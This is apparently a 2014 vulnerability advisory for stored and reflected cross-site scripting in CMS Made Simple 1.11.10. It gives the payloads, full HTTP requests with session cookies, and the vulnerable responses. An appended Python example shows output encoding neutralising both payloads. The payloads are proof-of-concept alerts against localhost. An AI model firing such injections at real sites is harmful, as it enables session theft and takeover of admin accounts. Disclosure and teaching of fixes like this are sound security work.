Exploit Title : CMS Made Simple 1.11.10 Multiple XSS Vulnerability
Google dork : N/A
Date : 02/04/2014
Exploit Author : Blessen Thomas
Vendor Homepage : http://www.cmsmadesimple.org/
Software Link : N/A
Version : 1.11.10
Tested on : Windows 7 hosted in WAMP server
Type of Application : open source content management system
Stored XSS :
Log in to the admin portal and access the search functionality:
http://localhost/cmsmadesimple-1.11.10-full/index.php
Here the "search" parameter is vulnerable to stored XSS.
Payload :
'">><marquee><img src=x onerror=confirm(1)
Request :
POST http://localhost/cmsmadesimple-1.11.10-full/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cmsmadesimple-1.11.10-full/index.php
Cookie: _sx_=3ee623ee0900c03b; cms_admin_user_id=1; cms_passhash=fcb88b76587f0658cd2481a004312918; CMSSESSIDd508249c=qijlp266idmf9sjc51bai74lg7; PHPSESSID=5fvasiledip329l0bhr2ulb1j0; CMSSESSID7a29d042=qv3lpa3fpdflsmqac1icp5cfe7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 153

mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15&cntnt01searchinput=%27%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29&submit=Submit
Response :
<div id="search" class="core-float-right">
'">><marquee><img src=x onerror=confirm(1)
</div>
<a href="http://localhost/cmsmadesimple-1.11.10-full/"
title="Home Page, shortcut key=1" >CMS Made Simple Site</a>
</div>
Reflected XSS :
Log in to the admin portal, click "My Preferences" and then open the "My Account" section.
Here the "email address" parameter is vulnerable to reflected XSS.
Payload :
"";</script><script>alert(0)</script><"
Request :
POST http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/cmsmadesimple-1.11.10-full/admin/myaccount.php?_sx_=1c8c76366630b299
Cookie: _sx_=1c8c76366630b299; cms_admin_user_id=1; cms_passhash=fcb88b76587f0658cd2481a004312918; CMSSESSIDd508249c=71ougg9mi3ikiilatfc0851no5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

active_tab=maintab&user=test&password=&passwordagain=&firstname=&lastname=&email="";</script><script>alert(0)</script><"&submit_account=Submit
Response :
</aside> </div> <!-- end sidebar //-->
<!-- start main -->
<div id="oe_mainarea" class="cf">
<aside class="message pageerrorcontainer" role="alert"><p>The email address entered is invalid: "";</script><script>alert(0)</script><"</p></aside>
<article role="main" class="content-inner"><header class="pageheader cf"><h1>My Account</h1><script type="text/javascript">
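Added example (not from the advisory or from the CMS Made Simple code base): a Python stand-in for the two PHP output spots shown above, rendering the advisory's own search term and email value first unencoded (reproducing the vulnerable responses) and then with HTML entity encoding on output, which is the fix for both findings. `tag_openers` is an assumed helper using a regex, not a real HTML parser.

```python
import html
import re
from urllib.parse import parse_qs

# The search request body exactly as the advisory shows it (URL-encoded).
SEARCH_BODY = ("mact=Search%2Ccntnt01%2Cdosearch%2C0&cntnt01returnid=15"
               "&cntnt01searchinput=%27%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx"
               "+onerror%3Dconfirm%281%29&submit=Submit")
# The reflected value exactly as the advisory shows it in the email field.
EMAIL_PAYLOAD = '"";</script><script>alert(0)</script><"'


def search_term_from_body(body: str) -> str:
    """Decode cntnt01searchinput the way the application receives it."""
    return parse_qs(body)["cntnt01searchinput"][0]


def render_search_box(term: str, encode: bool) -> str:
    """Search box fragment from the advisory's response. encode=False reproduces
    the vulnerable output; encode=True applies HTML entity encoding on output."""
    value = html.escape(term, quote=True) if encode else term
    return '<div id="search" class="core-float-right">\n%s\n</div>' % value


def render_email_error(email: str, encode: bool) -> str:
    """Error message fragment from the advisory's response, same two modes."""
    value = html.escape(email, quote=True) if encode else email
    return "<p>The email address entered is invalid: %s</p>" % value


def tag_openers(fragment: str) -> list:
    """Assumed helper: names of the start tags in a fragment. A regex, not an
    HTML parser, but enough to show whether user input became markup."""
    return re.findall(r"<([a-zA-Z][a-zA-Z0-9]*)", fragment)


def injected_tags(fragment: str, template_tags: list) -> list:
    """Start tags present beyond those the template itself emits."""
    return [t for t in tag_openers(fragment) if t not in template_tags]


if __name__ == "__main__":
    term = search_term_from_body(SEARCH_BODY)
    cases = (("search", render_search_box(term, False), render_search_box(term, True), ["div"]),
             ("email", render_email_error(EMAIL_PAYLOAD, False),
              render_email_error(EMAIL_PAYLOAD, True), ["p"]))
    for name, unsafe, safe, template in cases:
        print(name, "unencoded injects:", injected_tags(unsafe, template))
        print(name, "encoded injects:  ", injected_tags(safe, template))
```

Encoding on output keeps the submitted text visible to the user (the word `onerror` still appears in the encoded search box) while no new tag reaches the browser.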